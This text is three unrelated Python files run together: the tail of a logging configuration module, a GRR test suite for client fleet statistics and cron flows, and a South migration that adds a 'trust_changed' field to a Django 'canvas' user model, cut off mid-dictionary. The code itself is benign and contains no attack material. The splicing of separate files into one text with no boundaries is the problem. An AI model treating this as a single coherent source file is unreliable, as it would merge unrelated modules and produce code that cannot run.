                                                   datefmt=dateformat))

    if CONF.debug:
        log_root.setLevel(logging.DEBUG)
    elif CONF.verbose:
        log_root.setLevel(logging.INFO)
    else:
        log_root.setLevel(logging.WARNING)

    # Apply per-logger overrides ('name=LEVEL' pairs). The loop variable
    # was previously named `mode`, shadowing the file-mode variable above.
    for pair in CONF.default_log_levels:
        logger_name, _sep, level_name = pair.partition('=')
        level = logging.getLevelName(level_name)
        logger = logging.getLogger(logger_name)
        logger.setLevel(level)
        for handler in log_root.handlers:
            logger.addHandler(handler)


def setup(product_name):
    """Configure logging for *product_name* from CONF."""
    _setup_logging_from_conf(product_name)


def _find_facility_from_conf():
    """Map CONF.syslog_log_facility to a SysLogHandler facility value.

    Returns None if the configured name is unknown.
    """
    facility_names = logging.handlers.SysLogHandler.facility_names
    facility = getattr(logging.handlers.SysLogHandler,
                       CONF.syslog_log_facility, None)
    if facility is None and CONF.syslog_log_facility in facility_names:
        facility = facility_names.get(CONF.syslog_log_facility)
    return facility


def _get_binary_name():
    """Name of the outermost script on the call stack."""
    return os.path.basename(inspect.stack()[-1][1])


def _get_log_file_path(binary=None):
    """Resolve the log file path from CONF.log_file / CONF.log_dir.

    Returns None when neither option is set.
    """
    logfile = CONF.log_file
    logdir = CONF.log_dir
    if logfile and not logdir:
        return logfile
    if logfile and logdir:
        return os.path.join(logdir, logfile)
    if logdir:
        binary = binary or _get_binary_name()
        return '%s.log' % (os.path.join(logdir, binary))
    return None


def getLogger(name='unknown', version='unknown'):
    """Return (and cache) a ContextAdapter for *name*.

    The debug ``print _loggers`` was removed: a library accessor should
    not write to stdout on every call.
    """
    if name not in _loggers:
        _loggers[name] = ContextAdapter(logging.getLogger(name),
                                        name, version)
    return _loggers[name]


if __name__ == "__main__":
    setup("glance")
    log = getLogger("test")
    log.warning("this is a test logging method")
#!/usr/bin/env python
"""System cron flows tests."""


from grr.endtoend_tests import base
from grr.lib import action_mocks
from grr.lib import aff4
from grr.lib import config_lib
from grr.lib import flags
from grr.lib import flow
from grr.lib import test_lib
from grr.lib import utils
from grr.lib.flows.cron import system
from grr.lib.flows.general import endtoend as endtoend_flows
from grr.lib.flows.general import endtoend_test
from grr.lib.rdfvalues import client as client_rdf
from grr.lib.rdfvalues import flows
from grr.test_data import client_fixture


class SystemCronFlowTest(test_lib.FlowTestsBaseclass):
  """Test system cron flows."""

  def setUp(self):
    """Create 10 Windows clients (labelled) and 10 Linux clients."""
    super(SystemCronFlowTest, self).setUp()

    # We are only interested in the client object (path = "/" in client VFS)
    fixture = test_lib.FilterFixture(regex="^/$")

    # Make 10 windows clients
    for i in range(0, 10):
      test_lib.ClientFixture("C.0%015X" % i, token=self.token,
                             fixture=fixture)

      # Attach both system ("GRR"-owned) and user-owned labels.
      with aff4.FACTORY.Open(
          "C.0%015X" % i, mode="rw", token=self.token) as client:
        client.AddLabels("Label1", "Label2", owner="GRR")
        client.AddLabels("UserLabel", owner="jim")

    # Make 10 linux clients 12 hours apart.
    for i in range(0, 10):
      test_lib.ClientFixture("C.1%015X" % i, token=self.token,
                             fixture=client_fixture.LINUX_FIXTURE)

  def _CheckVersionStats(self, label, attribute, counts):
    """Assert the version histogram for `label` matches `counts`.

    counts[0..3] correspond to the 1/7/14/30-day active buckets.
    """
    fd = aff4.FACTORY.Open("aff4:/stats/ClientFleetStats/%s" % label,
                           token=self.token)
    histogram = fd.Get(attribute)

    # There should be counts[0] instances in 1 day actives.
    self.assertEqual(histogram[0].title,
                     "1 day actives for %s label" % label)
    self.assertEqual(len(histogram[0]), counts[0])

    # There should be counts[1] instances in 7 day actives.
    self.assertEqual(histogram[1].title,
                     "7 day actives for %s label" % label)
    self.assertEqual(len(histogram[1]), counts[1])

    # There should be counts[2] instances in 14 day actives.
    self.assertEqual(histogram[2].title,
                     "14 day actives for %s label" % label)
    self.assertEqual(histogram[2][0].label, "GRR Monitor 1")
    self.assertEqual(histogram[2][0].y_value, counts[2])

    # There should be counts[3] instances in 30 day actives.
    self.assertEqual(histogram[3].title,
                     "30 day actives for %s label" % label)
    self.assertEqual(histogram[3][0].label, "GRR Monitor 1")
    self.assertEqual(histogram[3][0].y_value, counts[3])

  def testGRRVersionBreakDown(self):
    """Check that all client stats cron jobs are run.

    All machines should be in All once. Windows machines should be in Label1
    and Label2. There should be no stats for UserLabel.
    """
    for _ in test_lib.TestFlowHelper("GRRVersionBreakDown",
                                     token=self.token):
      pass

    histogram = aff4.ClientFleetStats.SchemaCls.GRRVERSION_HISTOGRAM
    self._CheckVersionStats("All", histogram, [0, 0, 20, 20])
    self._CheckVersionStats("Label1", histogram, [0, 0, 10, 10])
    self._CheckVersionStats("Label2", histogram, [0, 0, 10, 10])

    # This shouldn't exist since it isn't a system label
    # NOTE(review): the Open() result is unused — presumably Open with the
    # "AFF4Volume" type is expected to raise for a missing path; confirm
    # this line actually asserts anything.
    aff4.FACTORY.Open("aff4:/stats/ClientFleetStats/UserLabel",
                      "AFF4Volume",
                      token=self.token)

  def _CheckOSStats(self, label, attribute, counts):
    """Assert the OS histogram for `label` matches `counts`.

    counts[0..1] are bucket lengths; counts[2..3] map OS name -> count.
    """
    fd = aff4.FACTORY.Open("aff4:/stats/ClientFleetStats/%s" % label,
                           token=self.token)
    histogram = fd.Get(attribute)

    # There should be counts[0] instances in 1 day actives.
    self.assertEqual(histogram[0].title,
                     "1 day actives for %s label" % label)
    self.assertEqual(len(histogram[0]), counts[0])

    # There should be counts[1] instances in 7 day actives.
    self.assertEqual(histogram[1].title,
                     "7 day actives for %s label" % label)
    self.assertEqual(len(histogram[1]), counts[1])

    # There should be counts[2] instances in 14 day actives for linux and
    # windows.
    self.assertEqual(histogram[2].title,
                     "14 day actives for %s label" % label)
    all_labels = []
    for item in histogram[2]:
      all_labels.append(item.label)
      self.assertEqual(item.y_value, counts[2][item.label])
    self.assertItemsEqual(all_labels, counts[2].keys())

    # There should be counts[3] instances in 30 day actives for linux and
    # windows.
    self.assertEqual(histogram[3].title,
                     "30 day actives for %s label" % label)
    all_labels = []
    for item in histogram[3]:
      all_labels.append(item.label)
      self.assertEqual(item.y_value, counts[3][item.label])
    self.assertItemsEqual(all_labels, counts[3].keys())

  def testOSBreakdown(self):
    """Check that all client stats cron jobs are run."""
    for _ in test_lib.TestFlowHelper("OSBreakDown", token=self.token):
      pass

    histogram = aff4.ClientFleetStats.SchemaCls.OS_HISTOGRAM
    self._CheckOSStats("All", histogram,
                       [0, 0, {"Linux": 10, "Windows": 10},
                        {"Linux": 10, "Windows": 10}])
    self._CheckOSStats("Label1", histogram,
                       [0, 0, {"Windows": 10}, {"Windows": 10}])
    self._CheckOSStats("Label2", histogram,
                       [0, 0, {"Windows": 10}, {"Windows": 10}])

  def _CheckAccessStats(self, label, count):
    """Assert the last-contacted histogram for `label`.

    Bucket x-values are microseconds (1/2/3/7/14/30/60 days).
    """
    fd = aff4.FACTORY.Open("aff4:/stats/ClientFleetStats/%s" % label,
                           token=self.token)

    histogram = fd.Get(fd.Schema.LAST_CONTACTED_HISTOGRAM)

    data = [(x.x_value, x.y_value) for x in histogram]

    self.assertEqual(data, [
        (86400000000L, 0L),
        (172800000000L, 0L),
        (259200000000L, 0L),
        (604800000000L, 0L),
        (1209600000000L, count),
        (2592000000000L, count),
        (5184000000000L, count)])

  def testLastAccessStats(self):
    """Check that all client stats cron jobs are run."""
    for _ in test_lib.TestFlowHelper("LastAccessStats", token=self.token):
      pass

    # All our clients appeared at the same time (and did not appear since).
    self._CheckAccessStats("All", count=20L)

    # All our clients appeared at the same time but this label is only half.
    self._CheckAccessStats("Label1", count=10L)

    # All our clients appeared at the same time but this label is only half.
    self._CheckAccessStats("Label2", count=10L)

  def testPurgeClientStats(self):
    """Stats older than MAX_AGE must be removed; newer ones kept."""
    max_age = system.PurgeClientStats.MAX_AGE

    # Write three ClientStats entries at 1x, 1.5x and 2x MAX_AGE.
    for t in [1 * max_age, 1.5 * max_age, 2 * max_age]:
      with test_lib.FakeTime(t):
        urn = self.client_id.Add("stats")

        stats_fd = aff4.FACTORY.Create(urn, "ClientStats",
                                       token=self.token, mode="rw")
        st = client_rdf.ClientStats(RSS_size=int(t))
        stats_fd.AddAttribute(stats_fd.Schema.STATS(st))

        stats_fd.Close()

    stat_obj = aff4.FACTORY.Open(urn, age=aff4.ALL_TIMES, token=self.token,
                                 ignore_cache=True)
    stat_entries = list(
        stat_obj.GetValuesForAttribute(stat_obj.Schema.STATS))
    self.assertEqual(len(stat_entries), 3)
    self.assertTrue(max_age in [e.RSS_size for e in stat_entries])

    # At 2.5x MAX_AGE, only the oldest entry (written at 1x) is expired.
    with test_lib.FakeTime(2.5 * max_age):
      for _ in test_lib.TestFlowHelper(
          "PurgeClientStats", None, client_id=self.client_id,
          token=self.token):
        pass

      stat_obj = aff4.FACTORY.Open(urn, age=aff4.ALL_TIMES,
                                   token=self.token, ignore_cache=True)
      stat_entries = list(
          stat_obj.GetValuesForAttribute(stat_obj.Schema.STATS))
      self.assertEqual(len(stat_entries), 1)
      self.assertTrue(max_age not in [e.RSS_size for e in stat_entries])

  def _SetSummaries(self, client_id):
    """Populate client metadata so it looks like a real OS X machine."""
    client = aff4.FACTORY.Create(client_id, "VFSGRRClient", mode="rw",
                                 token=self.token)
    client.Set(client.Schema.HOSTNAME(client_id))
    client.Set(client.Schema.SYSTEM("Darwin"))
    client.Set(client.Schema.OS_RELEASE("OSX"))
    client.Set(client.Schema.OS_VERSION("10.9.2"))
    client.Set(client.Schema.KERNEL("13.1.0"))
    client.Set(client.Schema.FQDN("%s.example.com" % client_id))
    client.Set(client.Schema.ARCH("AMD64"))
    client.Flush()

  def testEndToEndTests(self):
    """EndToEndTests flow should start one hunt covering all clients."""
    self.client_ids = ["aff4:/C.6000000000000000",
                       "aff4:/C.6000000000000001",
                       "aff4:/C.6000000000000002"]
    for clientid in self.client_ids:
      self._SetSummaries(clientid)

    self.client_mock = action_mocks.ActionMock("ListDirectory", "StatFile")

    config_lib.CONFIG.Set("Test.end_to_end_client_ids", self.client_ids)
    with utils.MultiStubber((base.AutomatedTest, "classes",
                             {"MockEndToEndTest":
                              endtoend_test.MockEndToEndTest}),
                            (system.EndToEndTests, "lifetime", 0)):

      # The test harness doesn't understand the callstate at a later time that
      # this flow is doing, so we need to disable check_flow_errors.
      for _ in test_lib.TestFlowHelper("EndToEndTests", self.client_mock,
                                       client_id=self.client_id,
                                       check_flow_errors=False,
                                       token=self.token):
        pass

    test_lib.TestHuntHelperWithMultipleMocks({}, check_flow_errors=False,
                                             token=self.token)
    hunt_ids = list(aff4.FACTORY.Open("aff4:/hunts",
                                      token=self.token).ListChildren())
    # We have only created one hunt, and we should have started with clean aff4
    # space.
    self.assertEqual(len(hunt_ids), 1)

    hunt_obj = aff4.FACTORY.Open(hunt_ids[0], token=self.token,
                                 age=aff4.ALL_TIMES)
    self.assertItemsEqual(sorted(hunt_obj.GetClients()),
                          sorted(self.client_ids))

  def _CreateResult(self, success, clientid):
    """Wrap a bool into an EndToEndTestResult message from `clientid`."""
    success = endtoend_flows.EndToEndTestResult(success=success)
    return flows.GrrMessage(source=clientid, payload=success)

  def testEndToEndTestsResultChecking(self):
    """_CheckForSuccess must require a passing result from every client."""
    self.client_ids = ["aff4:/C.6000000000000000",
                       "aff4:/C.6000000000000001",
                       "aff4:/C.6000000000000002"]
    for clientid in self.client_ids:
      self._SetSummaries(clientid)

    self.client_mock = action_mocks.ActionMock("ListDirectory", "StatFile")

    endtoend = system.EndToEndTests(None, token=self.token)
    endtoend.state.Register("hunt_id", "aff4:/temphuntid")
    endtoend.state.Register("client_ids", set(self.client_ids))
    endtoend.state.Register("client_ids_failures", set())
    endtoend.state.Register("client_ids_result_reported", set())

    # No results at all
    self.assertRaises(flow.FlowError, endtoend._CheckForSuccess, [])

    # Not enough client results
    endtoend.state.Register("client_ids_failures", set())
    endtoend.state.Register("client_ids_result_reported", set())
    self.assertRaises(flow.FlowError, endtoend._CheckForSuccess,
                      [self._CreateResult(True,
                                          "aff4:/C.6000000000000001")])

    # All clients succeeded
    endtoend.state.Register("client_ids_failures", set())
    endtoend.state.Register("client_ids_result_reported", set())
    endtoend._CheckForSuccess(
        [self._CreateResult(True, "aff4:/C.6000000000000000"),
         self._CreateResult(True, "aff4:/C.6000000000000001"),
         self._CreateResult(True, "aff4:/C.6000000000000002")])

    # All clients complete, but some failures
    endtoend.state.Register("client_ids_failures", set())
    endtoend.state.Register("client_ids_result_reported", set())
    self.assertRaises(flow.FlowError, endtoend._CheckForSuccess,
                      [self._CreateResult(True,
                                          "aff4:/C.6000000000000000"),
                       self._CreateResult(False,
                                          "aff4:/C.6000000000000001"),
                       self._CreateResult(False,
                                          "aff4:/C.6000000000000002")])


def main(argv):
  # Run the full test suite
  test_lib.GrrTestProgram(argv=argv)

if __name__ == "__main__":
  flags.StartMain(main)
# encoding: utf-8
"""South schema migration: add the nullable ``trust_changed`` timestamp
column to the canvas app's ``UserInfo`` model (``canvas_userinfo`` table)."""
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models


class Migration(SchemaMigration):
    # Auto-generated by South; forwards/backwards apply and revert the single
    # column change, and ``models`` is the frozen ORM snapshot South uses to
    # build the ``orm`` argument. Do not hand-edit the frozen dict.

    def forwards(self, orm):
        # Adding field 'UserInfo.trust_changed'
        db.add_column('canvas_userinfo', 'trust_changed', self.gf('canvas.util.UnixTimestampField')(null=True, blank=True), keep_default=False)

    def backwards(self, orm):
        # Deleting field 'UserInfo.trust_changed'
        db.delete_column('canvas_userinfo', 'trust_changed')

    # Frozen ORM state at generation time; all field options are stored as
    # strings ('True', '0', "orm['...']") per South's freezing convention.
    models = {
        'auth.group': {
            'Meta': {'object_name': 'Group'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        'auth.permission': {
            'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '254', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        'canvas.apiapp': {
            'Meta': {'object_name': 'APIApp'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
        },
        'canvas.apiauthtoken': {
            'Meta': {'unique_together': "(('user', 'app'),)", 'object_name': 'APIAuthToken'},
            'app': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['canvas.APIApp']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'token': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
        },
        'canvas.bestof': {
            'Meta': {'object_name': 'BestOf'},
            'category': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'best_of'", 'null': 'True', 'blank': 'True', 'to': "orm['canvas.Category']"}),
            'chosen_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
            'comment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'best_of'", 'to': "orm['canvas.Comment']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'timestamp': ('canvas.util.UnixTimestampField', [], {})
        },
        'canvas.category': {
            'Meta': {'object_name': 'Category'},
            'description': ('django.db.models.fields.CharField', [], {'max_length': '140'}),
            'founded': ('django.db.models.fields.FloatField', [], {'default': '1298956320'}),
            'founder': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'founded_groups'", 'null': 'True', 'blank': 'True', 'to': "orm['auth.User']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'moderators': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'moderated_categories'", 'symmetrical': 'False', 'to': "orm['auth.User']"}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '20'}),
            'visibility': ('django.db.models.fields.IntegerField', [], {'default': '0'})
        },
        'canvas.comment': {
            'Meta': {'object_name': 'Comment'},
            'anonymous': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'author': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'comments'", 'null': 'True', 'blank': 'True', 'to': "orm['auth.User']"}),
            'category': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'comments'", 'null': 'True', 'blank': 'True', 'to': "orm['canvas.Category']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'ip': ('django.db.models.fields.IPAddressField', [], {'default': "'0.0.0.0'", 'max_length': '15'}),
            'judged': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'ot_hidden': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'parent_comment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'replies'", 'null': 'True', 'blank': 'True', 'to': "orm['canvas.Comment']"}),
            'parent_content': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'comments'", 'null': 'True', 'to': "orm['canvas.Content']"}),
            'posted_on_quest_of_the_day': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'replied_comment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['canvas.Comment']", 'null': 'True', 'blank': 'True'}),
            'reply_content': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'used_in_comments'", 'null': 'True', 'to': "orm['canvas.Content']"}),
            'reply_text': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'blank': 'True'}),
            'score': ('django.db.models.fields.FloatField', [], {'default': '0', 'db_index': 'True'}),
            'skip_moderation': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'timestamp': ('canvas.util.UnixTimestampField', [], {'default': '0'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '140', 'blank': 'True'}),
            'visibility': ('django.db.models.fields.IntegerField', [], {'default': '0'})
        },
        'canvas.commentflag': {
            'Meta': {'object_name': 'CommentFlag'},
            'comment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'flags'", 'to': "orm['canvas.Comment']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
            'timestamp': ('canvas.util.UnixTimestampField', [], {}),
            'type_id': ('django.db.models.fields.IntegerField', [], {}),
            'undone': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'flags'", 'to': "orm['auth.User']"})
        },
        'canvas.commentmoderationlog': {
            'Meta': {'object_name': 'CommentModerationLog'},
            'comment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['canvas.Comment']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'moderator': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
            'note': ('django.db.models.fields.TextField', [], {}),
            'timestamp': ('canvas.util.UnixTimestampField', [], {}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'moderated_comments_log'", 'to': "orm['auth.User']"}),
            'visibility': ('django.db.models.fields.IntegerField', [], {})
        },
        'canvas.commentpin': {
            'Meta': {'object_name': 'CommentPin'},
            'auto': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'comment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['canvas.Comment']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'timestamp': ('canvas.util.UnixTimestampField', [], {}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
        },
        'canvas.commentsticker': {
            'Meta': {'object_name': 'CommentSticker'},
            'comment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'stickers'", 'to': "orm['canvas.Comment']"}),
            'epic_message': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '140', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
            'timestamp': ('canvas.util.UnixTimestampField', [], {}),
            'type_id': ('django.db.models.fields.IntegerField', [], {}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'})
        },
        'canvas.commentstickerlog': {
            'Meta': {'object_name': 'CommentStickerLog'},
            'comment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['canvas.Comment']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
        },
        'canvas.content': {
            'Meta': {'object_name': 'Content'},
            'alpha': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'animated': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'id': ('django.db.models.fields.CharField', [], {'max_length': '40', 'primary_key': 'True'}),
            'ip': ('django.db.models.fields.IPAddressField', [], {'default': "'0.0.0.0'", 'max_length': '15'}),
            'remix_of': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'remixes'", 'null': 'True', 'to': "orm['canvas.Content']"}),
            'remix_text': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1000', 'blank': 'True'}),
            'source_url': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '4000', 'blank': 'True'}),
            'stamps_used': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'used_as_stamp'", 'blank': 'True', 'to': "orm['canvas.Content']"}),
            'timestamp': ('canvas.util.UnixTimestampField', [], {}),
            'url_mapping': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['canvas.ContentUrlMapping']", 'null': 'True', 'blank': 'True'}),
            'visibility': ('django.db.models.fields.IntegerField', [], {'default': '0'})
        },
        'canvas.contenturlmapping': {
            'Meta': {'object_name': 'ContentUrlMapping'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
        },
        'canvas.emailunsubscribe': {
            'Meta': {'object_name': 'EmailUnsubscribe'},
            'email': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
        },
        'canvas.externalcontent': {
            'Meta': {'object_name': 'ExternalContent'},
            '_data': ('django.db.models.fields.TextField', [], {'default': "'{}'"}),
            'content_type': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'parent_comment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'external_content'", 'to': "orm['canvas.Comment']"}),
            'source_url': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '4000', 'null': 'True', 'blank': 'True'})
        },
        'canvas.facebookinvite': {
            'Meta': {'object_name': 'FacebookInvite'},
            'fb_message_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'invited_fbid': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'invitee': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'facebook_invited_from'", 'null': 'True', 'blank': 'True', 'to': "orm['auth.User']"}),
            'inviter': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'facebook_sent_invites'", 'null': 'True', 'blank': 'True', 'to': "orm['auth.User']"})
        },
        'canvas.facebookuser': {
            'Meta': {'object_name': 'FacebookUser'},
            'email': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'fb_uid': ('django.db.models.fields.BigIntegerField', [], {'unique': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'gender': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'last_invited': ('canvas.util.UnixTimestampField', [], {'default': '0'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True', 'null': 'True', 'blank': 'True'})
        },
        'canvas.followcategory': {
            'Meta': {'unique_together': "(('user', 'category'),)", 'object_name': 'FollowCategory'},
            'category': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'followers'", 'to': "orm['canvas.Category']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'following'", 'to': "orm['auth.User']"})
        },
        'canvas.invitecode': {
            'Meta': {'object_name': 'InviteCode'},
            'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'invitee': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'invited_from'", 'null': 'True', 'blank': 'True', 'to': "orm['auth.User']"}),
            'inviter': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'sent_invites'", 'null': 'True', 'blank': 'True', 'to': "orm['auth.User']"})
        },
        'canvas.remixplugin': {
            'Meta': {'object_name': 'RemixPlugin'},
            'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            's3md5': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'timestamp': ('canvas.util.UnixTimestampField', [], {'default': '0'})
        },
        'canvas.stashcontent': {
            'Meta': {'object_name': 'StashContent'},
            'content': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['canvas.Content']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
        },
        'canvas.userinfo': {
            'Meta': {'object_name': 'UserInfo'},
            'avatar': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['canvas.Content']", 'null': 'True'}),
            'bio_text': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'blank': 'True'}),
            'enable_timeline': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'enable_timeline_posts': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'facebook_id': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
            'free_invites': ('django.db.models.fields.IntegerField', [], {'default': '10'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'invite_bypass': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
            'is_qa': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'post_anonymously': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'profile_image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['canvas.Comment']", 'null': 'True'}),
            'trust_changed': ('canvas.util.UnixTimestampField', [], {'null': 'True', 'blank': 'True'}),
            'trusted': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
            'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
        },
        'canvas.usermoderationlog': {
            'Meta': {'object_name': 'UserModerationLog'},
            'action': ('django.db.models.fields.IntegerField', [], {}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'moderator': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
            'note': ('django.db.models.fields.TextField', [], {}),
            'timestamp': ('canvas.util.UnixTimestampField', [], {}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'moderation_log'", 'to': "orm['auth.User']"})
        },
        'canvas.userwarning': {
            'Meta': {'object_name': 'UserWarning'},
